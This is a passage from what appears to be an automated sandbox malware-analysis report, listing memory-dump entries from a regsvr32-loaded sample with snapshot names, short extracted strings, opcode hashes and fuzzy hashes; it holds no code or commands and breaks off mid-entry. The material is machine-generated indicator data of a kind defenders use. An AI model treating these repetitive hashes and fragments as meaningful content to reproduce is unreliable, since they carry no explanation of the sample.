                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: VQ
                                                                                                                      • API String ID: 0-118804977
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d]d
                                                                                                                      • API String ID: 0-4116004022
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: h;
                                                                                                                      • API String ID: 0-4162755607
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c<#
                                                                                                                      • API String ID: 0-1682220262
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: VRs
                                                                                                                      • API String ID: 0-3606156352
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9A
                                                                                                                      • API String ID: 0-2059232346
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Bz
                                                                                                                      • API String ID: 0-1169448096
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;e
                                                                                                                      • API String ID: 0-3848007283
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tPR
                                                                                                                      • API String ID: 0-2373069265
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Jce
                                                                                                                      • API String ID: 0-1310344859
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4=P
                                                                                                                      • API String ID: 0-3718286612
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X
                                                                                                                      • API String ID: 0-1684620495
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: h}P
                                                                                                                      • API String ID: 0-1216288197
                                                                                                                      • Opcode ID: 84a4d61a42da1f51edcac172a3101b97c707e59eefbab1d5a02d52b46e76673c
                                                                                                                      • Instruction ID: 9456618e50480c69de1aee789d36f4583c4b86de9bff7617af87d8405f030e3e
                                                                                                                      • Opcode Fuzzy Hash: 84a4d61a42da1f51edcac172a3101b97c707e59eefbab1d5a02d52b46e76673c
                                                                                                                      • Instruction Fuzzy Hash: 6331E4706087848FC7A8DF28D48579BBBE1FB88314F508A6EE4C9D7261DB709949CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @v7
                                                                                                                      • API String ID: 0-1308831661
                                                                                                                      • Opcode ID: 4fb8d82e7dd62ffa33a4d3e6e8011f908f7e92baa1fc886f90df757c7464e597
                                                                                                                      • Instruction ID: c9dafb603daa025cde3dcf2e2aa06e2f40ce78453b605f5258dab0cda0177ccd
                                                                                                                      • Opcode Fuzzy Hash: 4fb8d82e7dd62ffa33a4d3e6e8011f908f7e92baa1fc886f90df757c7464e597
                                                                                                                      • Instruction Fuzzy Hash: CF41ACB090038E8FCF48CF68C88A5DE7FB1FB18348F404A1DE866A6250D3B49665CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: z[U
                                                                                                                      • API String ID: 0-4233267993
                                                                                                                      • Opcode ID: 5d2b3c17a7fc8d9a6559eadd97bcb1cd65db353f8752b5c9932d6af9fcaba772
                                                                                                                      • Instruction ID: 1089ee40c2b75a447c7de2f054715f6413e5fc39839455ed18423e87a3dc006e
                                                                                                                      • Opcode Fuzzy Hash: 5d2b3c17a7fc8d9a6559eadd97bcb1cd65db353f8752b5c9932d6af9fcaba772
                                                                                                                      • Instruction Fuzzy Hash: FE41A5B090078E8FDB48CF68C8495DE7BF0FB58358F104A19F86AA6650D7B4D664CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "u
                                                                                                                      • API String ID: 0-1278817916
                                                                                                                      • Opcode ID: 59f8f505f80c22a945ab5bf7f461bcccf9ee55834b2ae5d6943025df0176418d
                                                                                                                      • Instruction ID: c9c297cb883253826cf3c846531cf2ee63f2c3c3eb12fe00fce6ed51b89052a2
                                                                                                                      • Opcode Fuzzy Hash: 59f8f505f80c22a945ab5bf7f461bcccf9ee55834b2ae5d6943025df0176418d
                                                                                                                      • Instruction Fuzzy Hash: 7B41E07180034E8FCB48CF68C98A5DE7FF0FB58398F51461CE85AA6210D7B896A4CBC4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =H
                                                                                                                      • API String ID: 0-4141749632
                                                                                                                      • Opcode ID: 79785acb7560eeac92d65bae4a5b4a14858041cb3df4db8b7a7bd0dfe9d407a7
                                                                                                                      • Instruction ID: 6ecda789b8ca993028385bdf2f20f06c1c154f447285568a41e10d6c9d8aa6f9
                                                                                                                      • Opcode Fuzzy Hash: 79785acb7560eeac92d65bae4a5b4a14858041cb3df4db8b7a7bd0dfe9d407a7
                                                                                                                      • Instruction Fuzzy Hash: AA31D6B090034E8BCF48CF68C4965DE7FB0FB58398F14461DE856A6250D3B896A4CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "W^
                                                                                                                      • API String ID: 0-3181509884
                                                                                                                      • Opcode ID: 3625eec244765ae128aa1b985c6d7d21b8410776620582e754260a87434e0f98
                                                                                                                      • Instruction ID: d3dee1a6ed208e399b2354ee7e22f0ff5e838c15e4bfac6f477bfdfdde0c0671
                                                                                                                      • Opcode Fuzzy Hash: 3625eec244765ae128aa1b985c6d7d21b8410776620582e754260a87434e0f98
                                                                                                                      • Instruction Fuzzy Hash: 4941C2B190034A8BCB48CF28C4865DE7FB0FB68398F114619F85AA6250D7B896A4CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X
                                                                                                                      • API String ID: 0-1684620495
                                                                                                                      • Opcode ID: 53411ff0043618e283992c4f4fea215528bc53d6ab6ea16d2073080366889f7a
                                                                                                                      • Instruction ID: e4657bf1e222ab69f2ebb4ad410f11f33904ad55955fc654133dae7778857ba2
                                                                                                                      • Opcode Fuzzy Hash: 53411ff0043618e283992c4f4fea215528bc53d6ab6ea16d2073080366889f7a
                                                                                                                      • Instruction Fuzzy Hash: C83116B190034E8BCB4CCF68C4965EE7FB1FB54358F11461CF85A9A250D7B49AA4CBC4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: cNA
                                                                                                                      • API String ID: 0-3673276390
                                                                                                                      • Opcode ID: 3b86be78ee3254c173f5139cb17245b9e6c03df80cb14a782ae325b6b3becf33
                                                                                                                      • Instruction ID: 0baa392dd3c7f249919686d235ab909ed6574d81c122e4fd0ad74e2ae4a89866
                                                                                                                      • Opcode Fuzzy Hash: 3b86be78ee3254c173f5139cb17245b9e6c03df80cb14a782ae325b6b3becf33
                                                                                                                      • Instruction Fuzzy Hash: 754190B090074E8BCF89CF64C48A5CE7FB0FB28398F200619E85596250D3B496A5CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L8
                                                                                                                      • API String ID: 0-1649853053
                                                                                                                      • Opcode ID: c02a5f08d8cb81ff3a01b97ccc002f179eb97da066e427d9fb6e071bb2570d4b
                                                                                                                      • Instruction ID: 2b74a7649b1a64e7825447dc9da1b8301d3a6d05397f9c720543eb4fdc9c7f10
                                                                                                                      • Opcode Fuzzy Hash: c02a5f08d8cb81ff3a01b97ccc002f179eb97da066e427d9fb6e071bb2570d4b
                                                                                                                      • Instruction Fuzzy Hash: 3E41B4B181075E8FCB44DF64D48A5CE7FF0FB68398F201619F849A6260D3B496A4CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: l"
                                                                                                                      • API String ID: 0-4162449875
                                                                                                                      • Opcode ID: 4aa6842d3ce6096ca6bcc89522ee092a351a9426a29944682b07f7013063f854
                                                                                                                      • Instruction ID: 0cad62ed6c05024657d3901a13a70a97c7fed43324ac3cc9972d97c61628614f
                                                                                                                      • Opcode Fuzzy Hash: 4aa6842d3ce6096ca6bcc89522ee092a351a9426a29944682b07f7013063f854
                                                                                                                      • Instruction Fuzzy Hash: 7031D1B090074E8FCB58CF68C88A5DE7BF0FB58358F114619E959A6240D3B896A8CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *42^
                                                                                                                      • API String ID: 0-2886399368
                                                                                                                      • Opcode ID: 8d47aaf7e91c2064823ad72c2628bf6a3ee8809ab9e023cb99295748fa011138
                                                                                                                      • Instruction ID: c2e51d988f4e79c0116153a4a948c308d54fb409acdf9a24f75b2a0e99388d47
                                                                                                                      • Opcode Fuzzy Hash: 8d47aaf7e91c2064823ad72c2628bf6a3ee8809ab9e023cb99295748fa011138
                                                                                                                      • Instruction Fuzzy Hash: 393182B5529381AB8788DF28D09581EBBE1FBC9304FC06E1DF9868B260D375E405CB46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: z
                                                                                                                      • API String ID: 0-1657960367
                                                                                                                      • Opcode ID: 46a91f0c1077132480486274e3e940e14178b8bdc35d5bb6c4d0042ea1e30017
                                                                                                                      • Instruction ID: 185dcc7a676a4e8653741c4af792f5f974fb92a25d2c76856c764b4e4c270a2a
                                                                                                                      • Opcode Fuzzy Hash: 46a91f0c1077132480486274e3e940e14178b8bdc35d5bb6c4d0042ea1e30017
                                                                                                                      • Instruction Fuzzy Hash: 7F2148B46183808BD348DF28C05A51ABBF1FBCC31CF414B2DF4CAA6251D7BC96458B4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :,#
                                                                                                                      • API String ID: 0-1307288456
                                                                                                                      • Opcode ID: 606bbe6bffcc1c60fba7cdd790d8e46e6e1e6052ed82328e5c4aed2f2dd454e5
                                                                                                                      • Instruction ID: 94ede304cb048fdfa13ec708d8b4a0072234cf7431396941c9b159105a2600bc
                                                                                                                      • Opcode Fuzzy Hash: 606bbe6bffcc1c60fba7cdd790d8e46e6e1e6052ed82328e5c4aed2f2dd454e5
                                                                                                                      • Instruction Fuzzy Hash: A62192B0529781AFC788DF28D59592EBBF1FBC9344F806A1DF8868B354D3749449CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bc47e6e65e4a31775b881a64914b0aff5612f83fa249f362df64f37649f7b26f
                                                                                                                      • Instruction ID: bdf1b7d3c52ed84855c7067c3c091d6381e25179b8ccef7557aae0c60da6c962
                                                                                                                      • Opcode Fuzzy Hash: bc47e6e65e4a31775b881a64914b0aff5612f83fa249f362df64f37649f7b26f
                                                                                                                      • Instruction Fuzzy Hash: 4E41A0B090078ECFCF48DF68C88A5DE3BB0FB58358F014A19E86696250D3B4D669CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c49f742d8424404289193d8868621ac901cf9e967ae48bfeb4113da93c348ba0
                                                                                                                      • Instruction ID: 36cb71fdd8f179d5ff6e820e84779f24659b0a6968269d4304819db217bb9379
                                                                                                                      • Opcode Fuzzy Hash: c49f742d8424404289193d8868621ac901cf9e967ae48bfeb4113da93c348ba0
                                                                                                                      • Instruction Fuzzy Hash: D131AFB090038A8FCF48DF68C8865DE7FB0FB58358F514A19E85AA6250D7B8D664CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 272997156579645f24e94d0e228846b2f454e2f972357ff9ba2904dce351ae06
                                                                                                                      • Instruction ID: 1c493465c0d98bb4882c50897dd37d000269c1fae9b22fbff29a06e2a1336b83
                                                                                                                      • Opcode Fuzzy Hash: 272997156579645f24e94d0e228846b2f454e2f972357ff9ba2904dce351ae06
                                                                                                                      • Instruction Fuzzy Hash: 9C31ABB09587848BD388DF69C48A50BFBE1BBC4358F504A1DF8C296760D7B4D548CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8013182e11ee3a8c86dd2e656156254319a7e78dc0c5faeab6db5dccbf571966
                                                                                                                      • Instruction ID: aa4a7dda9d946902b7ebfadaec2fd2ff98ab66f8e28fc760664e7750b85bd54a
                                                                                                                      • Opcode Fuzzy Hash: 8013182e11ee3a8c86dd2e656156254319a7e78dc0c5faeab6db5dccbf571966
                                                                                                                      • Instruction Fuzzy Hash: 8031D3B040074ECBCF48CF24C48A5DE3FB0FB68388F104609F85AA6254D7B496A4CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 610f6731d46646f51338ee389dbcaaaebe3c66c8507d4a4b2da634d4faae6240
                                                                                                                      • Instruction ID: 931f8f53b134587435b8262e3dc30c17ae81dec4558e5e6d0d3904620be5ef09
                                                                                                                      • Opcode Fuzzy Hash: 610f6731d46646f51338ee389dbcaaaebe3c66c8507d4a4b2da634d4faae6240
                                                                                                                      • Instruction Fuzzy Hash: 9831ACB150039E8FCF48DF64C88A5CE7BB0FB18358F014A19E86AA6250D7B4D669CB95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 19ca53cd647b9caf6f02c8d282d8e6fd3f8e24e6358ece41ac7e3c44c6f46f58
                                                                                                                      • Instruction ID: e8b0edf5998bea0a4dde420793ccc2844137c7395e45db5bf9a5601ab04cf2b0
                                                                                                                      • Opcode Fuzzy Hash: 19ca53cd647b9caf6f02c8d282d8e6fd3f8e24e6358ece41ac7e3c44c6f46f58
                                                                                                                      • Instruction Fuzzy Hash: C0317E70528385AFC388DF28D4CA91ABBE0FBC9748F906A2DF8C686250D775D446CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: af524f830225b869b61c7703bf6b2f90f412e01c6fd4c2552f3320a9d1acbead
                                                                                                                      • Instruction ID: 0cbf02577aa860683974a02e7ee0f51c688bf140c24bf29fab8499070b94a73a
                                                                                                                      • Opcode Fuzzy Hash: af524f830225b869b61c7703bf6b2f90f412e01c6fd4c2552f3320a9d1acbead
                                                                                                                      • Instruction Fuzzy Hash: B531A1B050038E8FCB48CF68D88A5DE3BB0FB58358F504A1DE86696250D7B89664CBD9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 179d24e09472dbfeb4954f24f76bc0a0eed924a6bfa147ad6c686e72151bd97c
                                                                                                                      • Instruction ID: c7e6b47fe5e730b230a072bec5ce6cdb50e340a087ebfc1a4899d4b93ea5bc3b
                                                                                                                      • Opcode Fuzzy Hash: 179d24e09472dbfeb4954f24f76bc0a0eed924a6bfa147ad6c686e72151bd97c
                                                                                                                      • Instruction Fuzzy Hash: 95315CB06187848BD748DF28C45A51ABBE1BBDC308F404B2DF4CAAB350D778DA458B4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1fe986873ae8563229150ae099efa4ede7a6d2f63740cd1b15d29d4f7bf51cae
                                                                                                                      • Instruction ID: 17e363d1f9dfcaeba580523b8b32acecfa43d620a7b170a1f33da81232df59fb
                                                                                                                      • Opcode Fuzzy Hash: 1fe986873ae8563229150ae099efa4ede7a6d2f63740cd1b15d29d4f7bf51cae
